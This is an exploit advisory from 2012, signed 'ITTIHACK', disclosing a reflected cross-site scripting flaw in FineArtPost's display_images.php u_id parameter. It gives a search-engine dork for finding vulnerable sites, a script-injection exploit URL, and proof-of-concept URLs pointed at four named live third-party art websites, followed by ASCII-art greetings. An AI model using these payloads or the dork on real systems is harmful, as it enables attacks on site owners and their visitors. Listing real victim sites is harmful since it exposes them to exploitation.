FineArtPost suffers from a cross site scripting vulnerability.
99868fa03684b7957f38f4998b7dd0fa5d9f3a046484e69595f2690f7bd7ec49
FineArtPost XSS ( Cross Site Scripting ) Vulnerability
Software : FineArtPost
Date : 7/1/2012
Vendor : http://www.fineartpost.com/
Get App. : http://www.fineartpost.com/about_fap/pricing.php
Beta : http://www.fineartpost.com/fap2/beta.php
Price : $149.59
Dork : inurl:"/display_images.php?u_id=" "FineArtPost"
Author : ITTIHACK
Home : http://ittihack.com
Vulnerable file : display_images.php
Exploit : http://site/path/display_images.php?u_id=<script>alert(2012)</script>
Proof of concept:
http://www.greslearthart.com/public/display_images.php?u_id=<script>alert(2012)</script>
http://www.clairecolemanart.com/public/display_images.php?u_id=<script>alert(2012)</script>
http://www.annrutecki.com/public/display_images.php?u_id=<script>alert(2012)</script>
http://www.fineartpost.com/harmon/public/display_images.php?u_id=<script>alert(2012)</script>
#Greatz to: ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/ Reinie \
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/